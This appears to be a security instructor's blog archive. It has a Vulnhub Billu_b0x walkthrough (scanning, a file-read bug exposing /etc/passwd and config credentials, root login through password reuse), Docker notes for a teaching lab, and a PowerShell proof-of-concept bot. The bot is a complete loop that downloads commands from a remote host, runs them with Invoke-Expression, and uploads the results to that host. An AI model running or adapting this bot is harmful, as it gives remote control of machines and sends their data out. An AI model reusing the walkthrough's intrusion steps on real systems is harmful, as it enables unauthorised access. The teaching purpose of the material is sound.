Sunday, October 29, 2017

Vulnhub: Billu_b0x Walkthrough

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub images to refresh my knowledge of the tools that can be used, and also to provide step-by-step walkthrough exercises that students can follow.

The first Vulnhub image I found was called Billu-b0x.  Below is the link to the image on Vulnhub, where it can be downloaded.  This image already has a variety of walkthroughs; the one I have chosen to highlight and follow closely is listed below.


Vulnhub Link: https://www.vulnhub.com/entry/billu-b0x,188/

Highlighted Walkthrough: 
https://scriptkidd1e.wordpress.com/billu-b0x-vulnhubs-vm-walkthrough/

Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer

Billu-b0x VM
Kali Linux Distro VM (Downloaded the VM edition from kali.org)
1 - nikto - Nikto Web Vulnerability Scanner
2 - dirb - Directory Buster
3 - burp - Burp Suite Free Edition v1.7
4 - Firefox Web Browser

1.  Set up the Kali VM and the Billu-b0x VM with host-only network settings.  Do this for both VMs prior to powering them on.  Both VMs require at least 5 GB of host memory to run in parallel.  I would recommend that you run the VMs on an SSD drive.

2.  Find the IP address that was given to the Billu_b0x VM.  The IP address provided in my environment is 172.16.216.129.  Then run an nmap scan against the IP address to identify the open ports.

Command: nmap -sV 172.16.216.129



3. The port scan came up with 2 ports being open: 22/tcp SSH and 80/tcp HTTP.  A step that I would take is to Google the versions of the services displayed to identify any applicable vulnerabilities.  To keep this brief I am not going to include my results.

4.  My host is running a version of Linux.  This step is not necessary for completing the lab, but I am going to demonstrate how I use SSH with X11 forwarding so that Burp Suite and Firefox running on the Kali VM appear on the host screen.  (There are tools to do this when the host is Windows; Google it.)

Command: ssh -X root@172.16.216.130  (The -X option enables X11 forwarding.  Run 'man ssh' for additional information about this and other parameters that can be used.)




5.  If you ran the command in step 4 correctly, you should see a prompt indicating that you logged in.  The default root password for Kali is toor.  Note: you will need to modify the SSH configuration on the Kali VM before step 4 will work.  To do this, modify the file on the Kali box to match the following screenshot.

Command: vim /etc/ssh/sshd_config  OR nano /etc/ssh/sshd_config  (Google the commands to find a cheat sheet for them.)


Scroll down to verify that X11Forwarding is set to yes.  On a production system you would probably set this to "no".


6.  Now, through the established SSH session, I am going to launch Firefox on the Kali box and it is going to appear on my host.  Notice that the heading of the window that pops up shows '(on kali)'.

Command: firefox




7.  Using Firefox I am now going to browse to the site and see what it presents.

URL: http://172.16.216.129



8.  By reading the page you can quickly see that it provides a hint that there may be a SQL injection vulnerability.  However, prior to jumping into finding a SQL injection vulnerability, look around more.  Right-click on the page and view the source code.  Sometimes you can find additional information, pages, or hints about what to do next.  Check to see if a robots.txt file exists, http://172.16.216.129/robots.txt.  Google the purpose of the robots.txt file if you do not know it.

9.  I like a tool called nikto.  It is a web vulnerability scanner that I typically execute when I first come across a page.

Command: nikto -h 172.16.216.129



10. Again, do not jump too fast into testing the vulnerabilities; continue to gather information about the virtual machine.  Record the results of the nikto command.  We will come back to them.

11. Now we are going to use dirb, or directory buster.  This will brute-force URLs to find additional pages or directories that we do not currently know about.  We are going to SSH into the Kali VM again; you can use the -X command line switch as demonstrated above.  You will have multiple SSH sessions open by the end of this.

Command: dirb http://172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt



12. In the above output from dirb you can see that a couple more directories were found.  As you read the individual lines, the code is the HTTP status code that is returned: 200 for a successful page load, a 302 when access is denied, etc.  Google the HTTP status codes if you have more questions.

13. With the information gathered, start to visit the pages and gather more information about what the pages do, what language they are written in, etc.  Try not to focus on any particular page yet; just look through them.

14. Also, knowing that it found PHPMyAdmin under the directory http://172.16.216.129/phpmy/, I reran nikto against that path to find some additional vulnerabilities.  Note: PHPMyAdmin normally has vulnerabilities and exploits published about it.

Command: nikto -h http://172.16.216.129/phpmy/



15. Notice, as you browse the files that were found, a README file that shows the version of PHPMyAdmin as 3.4.7.  A quick Google search identifies a published exploit that allows an authenticated attacker to inject an XML file and read arbitrary files like /etc/passwd.

16. After going through the files I am going to go back to the file http://172.16.216.129/test.php.  I am intrigued by the message presented on the page.  Maybe the file parameter can be used to read files on the web server.


17. To work more with the 'file' parameter we are going to use the Burp proxy that is on the Kali server and X11 forward the GUI portion of the tool, like we did for Firefox above.  After it loads, leave it as a temporary project and click Next, then load defaults, then click Start Burp.

Command: burpsuite


18.  After Burp loads, we need to turn interception off.  Click on the "Proxy" tab and then click on "Intercept is on"; it should say off after being clicked.


19.  This setting is not necessary, but I am demonstrating how it is done in the event you need to use it.  Under the Proxy tab click on Options.  Notice that the proxy is only listening on localhost port 8080.  If you have multiple people utilizing the proxy, or a local browser using the remote Kali proxy, you need to edit the setting and change it to all interfaces.  After you click OK, it will restart the listener on all interfaces using port 8080.


20.  Now, to allow your web browser to proxy the page you are visiting, you need to configure the browser to use the Burp proxy.  Below is a screenshot of how to get to the settings and how I have configured them.  I am using Firefox.



21.  Now, when the page http://172.16.216.129/test.php is hit through the browser, it should show up in Burp under the Target tab.  Right-click on test.php and then click "Send to Repeater" in the menu.  The Repeater tab should change color.


22.  When you click on the Repeater tab you should see the below image.  Remember that a web request is only text that is interpreted by the web server; in the case of PHP, it is interpreted server-side.

23. Change the request being sent to the web server to be a POST and then add a parameter of "file=/etc/passwd" as shown below.



24. Notice that the response that is returned has the same message: the file parameter is empty.  You need to work with the request headers and add the Content-Type header listed below.  Work with it until the response comes back with what appears to be the contents of the /etc/passwd file.
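To show why the Content-Type header matters in step 24 and what a fixed test.php would have to do, here is an added example that is not the VM's code: a minimal model of the observed 'file' handler beside a hardened version. The handler names, the allowlisted directory, the messages and the fake files are assumptions for this demo.

```python
"""Added example, not the VM's code: the test.php 'file' parameter behaviour
modelled from steps 23-24 next to a hardened version."""
import os
from urllib.parse import parse_qs

FORM = "application/x-www-form-urlencoded"
EMPTY_MSG = "'file' parameter is empty"   # constructed message, not the VM's exact text
DENIED = "access denied"
BASE_DIR = "/srv/billu/docs"              # assumed directory the app is allowed to serve

# Constructed stand-in for the server's filesystem so the demo runs offline.
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
    "/srv/billu/docs/readme.txt": "public readme\n",
}

def fake_read(path):
    return FAKE_FS.get(path, "<no such file>")

def parse_form_body(content_type, body):
    """PHP only fills $_POST for form-encoded bodies, so without the
    Content-Type header the 'file' parameter is never seen (step 24)."""
    media_type = (content_type or "").split(";")[0].strip().lower()
    if media_type != FORM:
        return {}
    return {k: v[0] for k, v in parse_qs(body).items()}

def vulnerable_read(content_type, body, read=fake_read):
    """Models the observed behaviour: whatever path is posted is read back."""
    path = parse_form_body(content_type, body).get("file", "")
    if not path:
        return EMPTY_MSG
    return read(path)          # no validation: /etc/passwd is served as-is

def hardened_read(content_type, body, base_dir=BASE_DIR, read=fake_read):
    """Resolve the request under an allowlisted directory and refuse anything
    that escapes it (absolute paths, '..' segments, symlinks out of the dir)."""
    name = parse_form_body(content_type, body).get("file", "")
    if not name:
        return EMPTY_MSG
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        return DENIED
    return read(candidate)
```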


25.  Now that we can display the contents of a file on the file system, let's look at the PHP code in the files that we know about.  Notice that the c.php file that we found using dirb contains a username and password used to connect to a MySQL database.


26. Now that we have a username and password we can use them to log in to PHPMyAdmin.  PHPMyAdmin is used to manage the database with that particular user's rights.  After logging in you can see the tables you have access to and more...



27.  In PHPMyAdmin click on Databases, then under Database select ica_lab.



28.  Then click on the auth table.


29.  Now, under the options, you can see the values in the database, including a plain-text password for biLLu.  This user can now be used to log in to the page at index.php.

30. After successfully logging in you can see the below screenshot.



31.  To keep this brief, I am going to jump back to the vulnerability that lets you view the source code of a file.  We are going to look at the configuration file for PHPMyAdmin.  This file is normally located at the root of the PHPMyAdmin installation.  For this site the file is located at http://172.16.216.129/phpmy/config.inc.php


32. As you look at the file that is returned, you notice that the PHPMyAdmin software is configured with the root username and password.  Because of password reuse on systems, you can use this username and password combination to log in as the root user through SSH.

I am going to conclude this walkthrough here; however, there will be more to come.  Take time to explore other ways to exploit this VM.

Enjoy.

Sunday, October 15, 2017

Docker - Quick Notes and How To

For an ethical hacking class that I will be teaching in the near future, I wanted to identify a way to provide students with a Kali Linux VM with Docker images that they could use to learn from.  In the past, I required the students to run at least 2 virtual machines to accomplish the tasks.  Resource constraints were sometimes an issue.

I believe that Docker running on a Kali Linux VM will work for what I need.  Here is a link to a site that you can use to walk through setting up Docker on Kali 2.x.

Link to site.

Here are some commands to get Docker up and running:

#> service docker start
This will start the Docker daemon, which runs in the background of the Kali VM.

#> docker search ubuntu
This command searches Docker Hub (internet access from the Kali VM is required) for any containers matching the word ubuntu.  As you can see in the screenshot below, it shows the name of the container, a brief description, the public rating of the container based on the number of stars, and whether it is an official release from a trusted vendor.



#> docker pull <name of the container>
In the below screenshot, I am pulling down a container called raesene/bwapp.  This was after I searched for bwa, or "Broken Web Apps", a project created by OWASP.  Notice that this package is not an official release and is contributed by a member of the community; this could be an unsafe Docker container and contain malware.  Below you can see Docker pulling, downloading and extracting the container from Docker Hub.




#> docker images
The below screenshot shows the output of the command: the images that I currently have.  The creation date is when the container was created on Docker Hub, or when you created it; for example, host1 was created by me 14 hours ago.  Warning: it is very easy to download containers and run out of disk space on the VM that you are using.




#> docker run -it ubuntu bash
In the below screenshot, the command was issued to run the ubuntu container in interactive mode.  The last item in the command is bash; this tells Docker to run the command bash in the container.  You are dropped into a bash shell where you can list the files in the container, etc.  Notice that the ifconfig command is not found.  As in a new install of Ubuntu, you can install net-tools to be able to run ifconfig and return interface information.


To install net-tools in the running container, first (for Ubuntu) execute apt-get update to update the package lists.


Then to install net-tools you can run apt-get install net-tools.


As observed above, after installing net-tools the ifconfig command returns the interface information of the Docker container.  Warning: if you type the command 'exit', you will return to the state of the container prior to installing net-tools.  Nothing is saved at this point in time.

Container #> Ctrl <p> Ctrl <q>
If you would like to keep the state of the container you are working in, press the above key sequence; it will drop you out to the Docker host (the Kali VM) while leaving the container running.

#> docker ps
The below screenshot demonstrates pressing Ctrl <p> Ctrl <q> to jump out of a Docker container; the subsequent 'docker ps' shows the container still running, the image used, the command being executed, when it was created, the uptime or status, any network ports that are mapped, and the nickname of the container assigned by Docker.


#> docker attach <container ID>
#> docker attach <Name or Nickname>
You can reattach to the Docker container by giving the container ID, as shown in the above screenshot, or the nickname provided by Docker.

#> docker commit <container ID> <New Image Name>
After interacting with the ubuntu container, installing net-tools, jumping out of the container while it is running, and now wanting to save the state the image is in, I can commit the changes to a new image name.  As you can see in the image below, I committed the running instance of the ubuntu image by calling it by its nickname, saving it as ubuntu-w-nettools.  Then when you run docker images, you can see the new image, which can be run as a container.


#> docker network create --driver=bridge network1 --subnet=172.31.0.0/24
By default, from what I have read, Docker creates a default bridged network of 172.17.0.0/16.  Wow, huge...  You can create additional networks that bridge to the host VM's NIC.  The above command creates a bridged network with the name network1 and assigns it the subnet 172.31.0.0/24.  Warning: bridging across the interface may allow the container to access the internet.

#> docker network ls
#> docker network inspect network1

The below screenshot shows the network1 that I created above, by running 'docker network ls'.  To get additional details about the networks I can inspect them individually.  The example below shows me the details of network1, mainly the subnet and the driver used.  My thought here was that I can control whether a container is in the DMZ or another subnet for organization.



#> docker run -tid --network=network1 --ip=172.31.0.7 ubuntu-w-nettools bash
The above command creates an interactive container; with -d it is placed in the background.  It assigns the container to network1 (the 172.31.0.0/24 subnet), gives it the IP address 172.31.0.7, uses the image that we created with net-tools installed, and runs the command bash.  As you can see in the below screenshot, the IP address returned by ifconfig is the one assigned.


#> docker run -d --network=network1 --ip=172.31.0.8 raesene/bwapp
Notice that for the above OWASP Broken Web Apps container you do not need the -it switches to make it interactive.  As you can see in the below image I have 3 containers running; raesene/bwapp has 2 ports mapped, so I can interact with ports 80 and 3306 via the assigned IP address.
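Before running a container with a fixed --ip as above, it is worth checking the address against what 'docker network inspect' reports. The following is an added example and not part of the post; the inspect JSON is constructed to mirror the network1 created above and is not real Docker output.

```python
"""Added example, not from the post: sanity-check a planned 'docker run --ip'
against 'docker network inspect' output. INSPECT_OUTPUT is constructed."""
import ipaddress
import json

# Constructed sample in the shape of 'docker network inspect network1'.
INSPECT_OUTPUT = json.dumps([{
    "Name": "network1",
    "Driver": "bridge",
    "IPAM": {"Config": [{"Subnet": "172.31.0.0/24", "Gateway": "172.31.0.1"}]},
    "Containers": {
        "abc123": {"Name": "host1", "IPv4Address": "172.31.0.7/24"},
    },
}])

def network_summary(inspect_json):
    """Return (name, driver, subnets, gateways, used_ips) from inspect output."""
    net = json.loads(inspect_json)[0]
    cfgs = net["IPAM"]["Config"]
    subnets = [ipaddress.ip_network(c["Subnet"]) for c in cfgs]
    gateways = {ipaddress.ip_address(c["Gateway"]) for c in cfgs if "Gateway" in c}
    # Containers already attached carry an address with a prefix, e.g. 172.31.0.7/24
    used = {ipaddress.ip_interface(c["IPv4Address"]).ip
            for c in net.get("Containers", {}).values()}
    return net["Name"], net["Driver"], subnets, gateways, used

def check_static_ip(inspect_json, ip):
    """Explain whether --ip=<ip> can be used on this network, or 'ok'."""
    addr = ipaddress.ip_address(ip)
    name, driver, subnets, gateways, used = network_summary(inspect_json)
    if name == "bridge":
        # Docker only honours --ip on user-defined networks, not the default bridge
        return "static IPs are not supported on the default bridge network"
    if driver != "bridge":
        return f"driver is {driver}, expected bridge"
    if not any(addr in s for s in subnets):
        return f"{addr} is outside " + ", ".join(str(s) for s in subnets)
    if addr in gateways:
        return f"{addr} is the gateway"
    if addr in used:
        return f"{addr} already in use"
    if any(addr in (s.network_address, s.broadcast_address) for s in subnets):
        return f"{addr} is a network or broadcast address"
    return "ok"
```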



#> docker rmi <image name>
This command removes an image from the list presented by 'docker images'.

#> docker stop <nickname of container>
#> docker stop <container ID>
#> docker kill <nickname of container>
#> docker kill <container ID>

As shown below, I am using the above commands to stop or kill the running container.  There is obviously a difference between stopping and killing a running container.



Hopefully this has been helpful.  I sat down yesterday with the intention of learning about Docker, and within 3 hours I had a very basic understanding of how it could benefit the class that I will be teaching and help in other ways in my career.  A warning again: the Docker service runs as root, and you should trust the containers that you download and execute.  Be careful; you may trust the creator but not trust who was on the creator's computer at the time.

Enjoy.

Thursday, October 12, 2017

Powershell - Using Add-Member to Add Scripts to the objects of a File

While at Saintcon 2017, I was in a training called "Attack and Defend with Powershell" taught by Aelon Porat.  During the training he created a file with Notepad and then displayed the attributes, properties, etc. of the file.  That got me thinking about a proof-of-concept for a bot that utilizes scripts added to a file object as a ScriptMethod.

The below bot calls out to an IP address to download a command that is inside a file on a web server, stores the command as a NoteProperty value on the file system object, executes the command, stores the results as another NoteProperty value, and then uploads the results.  This could have been combined into fewer script methods, but I did it this way to display the capability.

To run these PowerShell commands you need a file called note.txt in the directory where you run the PowerShell script below.




$ErrorActionPreference="SilentlyContinue"

# Get the file object for note.txt (the file must already exist in the current directory)
$file = Get-ChildItem note.txt

# Place a string value in a note property
$file | Add-Member -NotePropertyName Status -NotePropertyValue "123456abcABC+==" -Force # Use -Force to overwrite the note property
$file | Add-Member -NotePropertyName Collected -NotePropertyValue "123456abcABC+==" -Force

# Attach a script method to the file object to download the bot's command and save it in Status
$file | Add-Member -MemberType ScriptMethod -Name "Download" -Value {
    $webClient = New-Object System.Net.WebClient
    $noteInfo = $webClient.DownloadString("http://172.16.214.1/string.txt")
    $file | Add-Member -NotePropertyName Status -NotePropertyValue $noteInfo -Force
} -Force

# Then attach a script method to execute the command that is placed in Status
$file | Add-Member -MemberType ScriptMethod -Name "Execute" -Value {
    $collected = Invoke-Expression -Command $file.Status 2>&1
    $file | Add-Member -NotePropertyName Collected -NotePropertyValue $collected -Force
} -Force

# Then attach a script method which will upload the results
$file | Add-Member -MemberType ScriptMethod -Name "Upload" -Value {
    $postParams = @{info=$file.Collected}
    Invoke-WebRequest -Uri http://172.16.214.1/info -Method POST -Body $postParams
} -Force

# Loop forever: download a command, execute it, upload the result
while ($True) {
    $file.Download()
    Start-Sleep -Seconds 5
    $file.Execute()
    Start-Sleep -Seconds 5
    $file.Upload()
    Start-Sleep -Seconds 5
}

Another interesting discovery was that the Get-FileHash of the file "note.txt" does not change when the NotePropertyValue changes, because it is applied to the variable and not the file:


Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...